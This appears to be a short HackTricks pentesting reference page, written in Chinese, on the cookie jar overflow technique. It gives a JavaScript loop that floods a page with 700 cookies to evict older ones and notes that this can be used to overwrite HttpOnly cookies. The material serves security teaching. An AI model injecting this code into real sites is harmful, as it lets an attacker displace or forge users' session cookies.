{{#include ../../banners/hacktricks-training.md}}

浏览器对每个页面可以存储的**cookie数量有限制**。因此，如果出于某种原因你需要**让一个cookie消失**，你可以**溢出cookie罐**，因为最旧的cookie会被删除。
```javascript
// Set many cookies
for (let i = 0; i < 700; i++) {
document.cookie = `cookie${i}=${i}; Secure`
}

// Remove all cookies
for (let i = 0; i < 700; i++) {
document.cookie = `cookie${i}=${i};expires=Thu, 01 Jan 1970 00:00:01 GMT`
}
```
注意，指向不同域的第三方 cookies 不会被覆盖。

> [!CAUTION]
> 此攻击也可以用来**覆盖 HttpOnly cookies，因为您可以删除它，然后用您想要的值重置它**。
>
> 在[**这篇带实验室的文章**](https://www.sjoerdlangkemper.nl/2020/05/27/overwriting-httponly-cookies-from-javascript-using-cookie-jar-overflow/)中检查此内容。

{{#include ../../banners/hacktricks-training.md}}